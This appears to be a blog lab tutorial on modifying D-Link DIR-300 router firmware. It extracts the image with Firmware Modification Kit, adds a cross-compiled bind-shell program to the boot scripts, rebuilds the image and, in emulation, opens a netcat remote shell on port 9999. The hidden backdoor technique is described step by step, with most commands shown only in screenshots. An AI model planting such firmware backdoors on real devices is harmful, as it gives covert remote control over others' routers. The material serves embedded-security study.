SETTING A BINDSHELL BACKDOOR AT A D-LINK ROUTER FIRMWARE
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiweLjnD8ABGIKN_Dx8v8wDb7LzTUIwAnMZffiBKMjqN8klTIL-mCTDCyeGbHP_pOhhRVFuBzAJtXPGc-PTD12RcsIqEcGSJczTfEjnxmQj852NBhGT8iygBgZ33YyW4d2NgXF4LEV8sdFy/s400/layout.jpg)
1 - Introduction
- Firmware Modification Kit (FMK) allows to make changes to a firmware image without recompiling the firmware sources.
- First, It extracts the firmware into its component parts, and then extracts the file system image.
- The user can make modifications to the extracted file system, and finally rebuilding or recompiling the new firmware image.
- To download FMK:
https://github.com/mirror/firmware-mod-kit
- For further information:
https://bitsum.com/firmware_mod_kit.htm
- The goal of this exercise will be to modify a given firmware so that a malicious script is added at the boot up process.
- Once the firmware is modified, it will be rebuilt and run (emulated with FAT) as if it were the original firmware.
- The malicious script is of a bindshell type, and it will be executed as soon as the firmware is booted, allowing to have a remote connection (using netcat) with the firmware.
2 - Extracting the firmware with FMK
- Based on previous exercises, let's use again firmware from the router D-LINK dir-300b:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-L_m0tde9be02RPsJJZ2O5DpL46jkBFDyu-xmc31rs1xGbd7kZeLKVu4HVr5uEOuzMZ1Aom5FKFBMnuAR0Qdp0YXTbwm4nAoBEkQyFR5fSQ_q3JKdWC2jnu9sy22zGwfPVnPj37IsW1Ed/s1600/screenshot.8.jpg)
- Extracting the firmware with the FMK command ./extract-firmware.sh, the look of the output is similar to Binwalk, because both tools are closely related:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSSOSwhGx1XVnr36P-Ji2IovPKaHk8ovblSVU1sLU2fzDkZmZSLKHycVcKytEoaWKYJVKYLmH9jGDmvH7akPdO9ljy18FcrfHzuTzOx0FUNCcMMNEMD8-2irbYevAMVhbAsr_hQKqG8aSn/s1600/screenshot.10.jpg)
- A new folder is created:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEsdhG1KHb9MZ6ItxCb9yPPU-wBQrwaztlBk73ED0Xce5uFCjuw1lb7n_dIh5CpNv3YSwFYRp1aCUTnpKB0wZgsjieisUlJSxlc4mhjhKZd2DsOunixYTlfTqtETFYZqGWZzhQQQ_QUA4H/s400/screenshot.15.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8b2I7j5bYev9fEvIgJrzzWERR1SJnDkM7S7erI8GPCyqhnRQDEqZO8gDYBrjaKPJbN0vUYcrvaLgUDZANbdrsv2yHgpC2kjxmjEMWMO5_IASyZmxw4e5dzi4cDPneAFMDuGwDrbIkAw_j/s1600/screenshot.11.jpg)
- Going into the subfolder rootfs, the whole root file system is available:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQALASgbvxBVskXJKCG89qrevYPySO-mrvNH3OxaOFcyyQEIgMI7KEGITFJGnpy7qc-Rs-OZXWy-OAzCGCDCeWRkJQh5qfNF1U2xM5k4G8EH_3LdLvFb1laHL0fxav-zstO2NTasbjpco9/s1600/screenshot.12.jpg)
3 - Inserting a malicious script at the initial boot up process
- Because the goal of the exercise is that a malicious script runs at the boot up process, it would be interesting to place it where initial scripts are usually located, for instance the /etc/init.d folder:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8A7H9-wO6w_0HWQACw8V8uxszds50DLPGDNnKaZ6llSePwusfHI3J7Lm3PMxWem46I59NCNXvO11Q7Uijy94yPpcj8ZQOYrAXJ_upZz2voSuTABdtE7yqdWfhWCgBKk7h8O7JjNznSMrn/s1600/screenshot.16.jpg)
- We find that /etc/init.d/S10system.sh is redirected to /etc/scripts/system.sh
- Opening system.sh, there are all different scripts that are automatically triggered when the firmware is booted up:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4LplFMzUTH4KyztT5WdqB_hC4ixSv2Pgjj4TJLrH93UJD7-iOO_jRA1LG0gHGyJpwiHLO7CIWeUG5o-r9VlQaw-C6pEGo3IRveNuP1LT4CZlElr2xpyDTwnvkSFC84v0m2RNXjCMGeB39/s1600/screenshot.19.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgktFNgubkc8K1RAD7DVvAQx7pHCU-nti7X5YkoAK3gAIWLodbgmHiTQV2_xdSSq7bjH3loTiqNwQudgImPj8yqWQ7vmrub47hwnhDwj7YQ6kcFljw2Ov8o1Ka5zbvxiYqxJ6blEGuW7fT7/s1600/screenshot.17.jpg)
- Now, let's insert a call to a new script called bindshell (for now it is empty, it will be written at the next point of this exercise) in any startup location, for instance at /etc/templates:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizlQvcM34yjEJJRQJ2alGicROHNTXcz0UiWZPLeiZj6QJy1SYbKTPb1erAyZHEy0HjzYoucgeLNYTO8Xmoq6-wAhlo-IFOByUx7LRqW7wu_2gtyxyewqahlZm3qSeInZWd-N0YUBKxm9AM/s400/screenshot.18.jpg)
- Confirming that the call to the script /etc/templates/bindshell has been correctly added at any place of /etc/scripts/system.sh:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifxlAbQYXLPlCjmXUjLQoXoYs-G1NixsgP3J-XduioPByX4fXXk8br1MXTIviJxQhtA94qKxJx-TMwX70ADv6Y4GxhUaCRRG5Bmh5vgBEV_TW03EzOVkl2noAL9V5CIypx77uEWV3lGUtR/s1600/screenshot.20.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvMp13j7Htxlhrh3GZop06QYG-hl4c5sgkDZniMZ7k7kefiWWR55f7pCpk2qHvfLysZmziRvZT_RMJM8ghXyIRPa41iVif48NrSOfTliK_JV-ZEwhcgC5xkCnNXj_0-t0dWgDgj_KG8BFl/s400/screenshot.21.jpg)
4 - Bindshell
- In this exercise it will be used the program BindShell.c written by Osanda Malith, what is available here:
https://gist.github.com/OsandaMalith/a3b213b5e7582cf9aac3
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1dvUJHpg2arIwCtbQY5w2Avdz0To5MPx50tIsX6RfzVhSkZNGK-0H6TJLr02sd8NPDGD9GHAbn3kXkddgKLpimpO_6y14XsyP7biOVsToC_P8e65YvscljyCOvzphYLmzf8qNTnrHX7ZR/s1600/screenshot.22.jpg)
- This program binds a shell to a connection at port 9999:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpotfakrz7fbBh4cooYoB3NPw9hdQlcLBXouxnqAXT4qyGXMIUnjR2zvzDyc2or9BjDX3BfMU2op8wfk6WaRzImbuFGqtwqPMr9l4nu3c5eKD5wFXK8DCuZBejamBEBqFuU3puuOIx7Jo5/s1600/screenshot.23.jpg)
- The port is defined as a constant: 9999
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4WC8wpUkqLGZCyYB4tPjfKemPXs_hHro8AnXHgGPsgJLIA0N_w-6jwkxTEzWljjL9LTY0kkg1OX-aVXlNueW4Tsb7Q2YUge_5WhNlTDNquUBvABcCOwBuNFBOma63ZC9QX3q0ZIcchwLD/s400/screenshot.24.jpg)
5 - Compiling BindShell.c
- Because the router D-LINK dir-300b works with MIPS architecture, the program must be cross-compiled by a MIPS compiler:
- The MIPS cross-compiler is available here:
https://buildroot.org/downloads/
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqZvN5tyUOS8BAptaEFzClnf02t0uyNnfIJv3ascmkpdXvxbeRrveW1I3weps98bDxbadZeZFG-4vU9O6-sHyrVDMIS0B6L33L5h6QQaBn8ZDCOfposehlZSNn3cfy-8LrMtdqrZ1P61OE/s1600/screenshot.26.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN8EapBO73nQOeSpBxYcN7tOuD_gI90IbdX5-sKAhqzz1awNnAbada_-rhAoE6XAux22bN1YbAd8RlQzHvQ7jh2lVw9tPaMLmaCXYsGoygZiDnDSqee1NE4KEgaNdNYkHX2lIr3AcpZO4r/s1600/screenshot.25.jpg)
- Once extracted and decompressed as usually (unzip + tar), this is the option used to cross compile programs written in C to the MIPS architecture:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiws24M1YzGAYcrimLwGPR7EwjKUiSIhP7THTgBAmorR9HI9ZM9YViM3JsAIPr4qDJOzQDE3UBCW1TKRfxIYmNq1ZuqUCebD-SZk350kUKFiht2-qNAJ8Pa6vmNbiogQ5gIo9qLl_7IDysR/s1600/screenshot.27.jpg)
- Putting BindShell.c in the same folder that the compiler:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3VEHiZsnSGaOWsWFr3jcMi5IavQb9vkoTVCq54GykIPxNkBM8HAR_4XgFlIfh1zTv64mCX9pZYGD71o8UehWrC3dZwGQkG1OZnoX5ii7myeoYHvzBG3glGWoZSYi67DqMwyEn0nSZ_bRM/s1600/screenshot.28.jpg)
- Compiling, and naming the resulting file bindshell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjooIjRZW2xpNUaXkNcMAHWThsY8HslQsEY3AcNEdDtxOap0izMn_MEANoEr3ZniPWoDx8GVIcv8hdDiHCr3QttrpCoQTj0L7rdBZCBMYJ-ltCURDp4d_St1b9FhfARyWKQDKmzxIJcJn-F/s1600/screenshot.29.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO2DH4kJCUOkYMaaBDebS6irFrfGT7peb06-a_b1htC7SSQybaxFJSWUJp-qtDWgtQyA_a0mVLTuEp8uV8dSOHgnF9iU0j4iWGQtncsQcEV9TuAm5lajY9jqYqo3_xks7pL1u9aGRVxFOm/s1600/screenshot.30.jpg)
- Copying bindshell to /etc/templates:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Q3IpoBB1lEJqSJ-5jkxM_DXYVKWi2L2O0bh6Wlyq7xbx2R1X9AkDYVbAliM9VinqqlA0u9GCpZdWC6qzMU36udeZ-nPVwK6BVkGF6Wsnq06kmrfrzBrx8Kzjr1vKjWQS9HJ3dTTNo894/s1600/screenshot.51.jpg)
- Now, the script bindshell is ready to be launched as soon as the firmware boots up:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglVzL-RbLIhVfU6_8wbriMT0w__799t_iZ5J4AbeY3-dqseE-wy98an3eTK8K3B7Mqz0w_HZYJRlevZ3f0-lYvq_26osnMTs99qlY2djVjQcr6fmJtiWPM6UMbtRc1wLMzXlSGKWdUk1ju/s1600/screenshot.35.jpg)
- Checking that bindshell is executable for the MIPS architecture:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhljpOlZsqbAAM8mwKnIHBC_dHNJmcq6-6rgbvS_B-7i6u0UkxPoI_Fzr_nyCIuoOCPK_7hjKyZR3gQL7nLTrMLGmKfubCf2olbR0wcphHsg8xzfWUnG0zazwGq6YFrSb_MivB-nEaqMNga/s1600/screenshot.36.jpg)
6 - Building the new firmware
- So far, we have modified the original firmware by inserting a bindshell program as an initial script, to be launched when the firmware is booted up.
- To be effective that modification, the new firmware must be recompiled by using the command build-firmware.sh of FMK:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhniTMUS_nUq3NQ_7VX39nf0KnGyHeiMWAj70HWGzLoJadUBhH75KxRZf7ES1OllKBkPOJYZxZmtrxzu4nIOErfrdTZMgwW8uYjiG9qoMAL_iGhXzSmn2mMddHLnlJ3QjbzpomX82giTy9t/s1600/screenshot.37.jpg)
- Launching ./build-firmware over dir300b_v2.05 (now modified):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH40ZIdJ5TwqVLntt12537FHlMRlIn8yLhW1w98xKxglVAg6-G_CjMaj-uYJv2fUp1oOVuK5buJdSRx1BOSEHXveXXdBIE6S1oaOGQazWlDRPLCFGcb8cUpn_oqhZ4bPQdmS9Ck6P2J2IV/s1600/screenshot.41.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6lBd4iFhWx4QmyGByiw2RavNErghk3oEwCnDJqHAIW4uZKmKjWyQf8mUBskkpvl-w2D-OdfFLKst7ihzegyr-1V7LqVCMpK43Oe36sCZhzXYIqE7h892mWo0uFNLGK1Q5zUENbBa9RDgX/s1600/screenshot.40.jpg)
- Previous ERROR messages must be ignored because the firmware is correctly rebuilt.
- The resulting oputput is a file named new-firmware.bin, which is identical to the original one with the exception of the addition of the initial script bindshell.c:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuaUjf2N2kUjYECx33ydZ212gaQc2Wxfs3pUmh79lcQu_2QuGTZT6zyzCTUUStsIlM_2xViuVgrnph5A_R6WZJGH4WrjZO7E3MPW8M4SkylJZe49BR1Gh2MVannAV1t30Fcx34JOVXDEps/s1600/screenshot.42.jpg)
7 - Emulating the modified firmware with FAT
- Now, it is time to emulate new-firmware.bin with FAT, as done in previous exercises:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaxQLhsJXp4jPtPpvpI2GokwlmZZ6h22AXG7PpNlFCizJHfkuOf61RXHCetnMZYcLFHS_3-Ud7be7jRGE__vsjhS4dHAEQk_PiOycL-vuw__GYJghhdzGUhXz2uEHqoXBqEYuWKKQDMPLk/s1600/screenshot.43.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7uSvlRYmJo4z0huXwqPiowX9qyhs8drjDwqs8fRqNpE_mYvRpub8ZbqMQkmX1Goorr_z1JNV7oYDzF3_NkWaEX9QGefuRSlehj0oReNUTa12L5Fw05QjMOBTq0eV-ijANdqxtGYEGzk1W/s1600/screenshot.44.jpg)
- Launching fat.py and providing passwords (firmadyne):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0wwpGO3ZrajTQBRkOqkOtGXHTO6Jtk9nIXd0vzDkC0GwEWrtAJMyqN0JRPyqVG9DEpvBl_fQv1tYOvIemmCLOKZrb-pP_8j1yIl6usy2Tjbowr9J_LHvUdkvyBx-4w0Etlhb1JbffNeI/s1600/screenshot.45.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDtIruwsdZedzuzIayAKLhyMMtR9GZacO61AhQBk_xLsfLvySzSMITozkEhtNxvhU1hBmzMOcOo2qJgHbnjar99mlGT0gwH6GmWjfNgiZuJRz7utlU1CsyrSiumJdnZdjT_Z3DaA89RHXj/s1600/screenshot.46.jpg)
- Browsing to 192.168.0.1 the emulated new firmware is available, apparently identical to the orginal one:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ8PtNfJBLhXMGJ9KOfw6h81iBLwX-j3cp7aZqBsc6103gldMheggQCa_ULQ20DqEvn1UBmKB5G8vH5qAhLgxi8ILBNwmv62KwpsTfvS_0FlVb9qHdDjijk5kzLVpUjsWoWqz0aHuhmwdc/s1600/screenshot.47.jpg)
8 - Connecting with NETCAT
- However, now there is a very important difference with the original one, because a hidden script (bindshell) was launched when the firmware was booting up.
- Connecting with nc to 192.168.9.1 at port 9999, there is a remote shell allowing the user to see the whole content of the firmware:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-NGBlU0QVW3EFV_r0jRlW7Tq5QxWb-d3veWuBcl7JHYR7uvpgJAWqAiMo-KfzByZOg_HKqXuC-EY-PdLUUI7yac1kNjLNdzNJOms9uleom7tmtDA_lbSpoE4FEBLBrVA2j0CTqmOHV0T-/s1600/screenshot.48.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPBlkpXddH_BQZXPXC3PlgSyDs5RsV3cDCvLriuu-ioMziQWbhS6JBQq-tXsMmh0p4qeDccVnE4nXovpkOcn1Y3hbS-TVaL2UIwx0-fiuVvm089Lj4e3SqaP3pW3PgoF2tL159nsWVBYGp/s320/screenshot.50.jpg)
- It is interesting to notice that the type of CPU is of MIPS architecture, although it is running on an emulated firmware of x86 architecture:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6kwYLXBdCpfWlxsCao_LByUAn-cToj6wQOv0SS-H_P_h9ijiGaKQUKADLchRfQ8N0zGfJA6T_wy6_1vrTpXBjWz0Cjpc9rQD2e4IBLQxkuHaglDDINSII_GZmVsH3bACh4IAYs6xHaNP2/s1600/screenshot.49.jpg)